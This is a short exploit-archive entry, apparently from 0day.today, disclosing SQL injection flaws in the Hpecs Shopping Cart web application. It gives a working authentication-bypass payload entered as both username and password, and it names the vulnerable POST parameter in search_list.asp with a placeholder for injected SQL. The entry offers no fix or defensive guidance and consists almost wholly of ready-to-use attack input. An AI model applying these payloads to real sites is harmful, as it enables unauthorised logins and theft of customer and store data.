id: 1167
date: 11/14/2006
title: Hpecs Shopping Cart Remote Login Bypass Vulnerability
author: Security Access Point
cves: 

=====================================================
Hpecs Shopping Cart Remote Login Bypass Vulnerability
=====================================================



vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high


login bypass :
username:     'or''='
passwd:       'or''='

injection sql (post) :

http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
 ( or just post your query in the search engine ... )




#  0day.today [2023-03-26]  #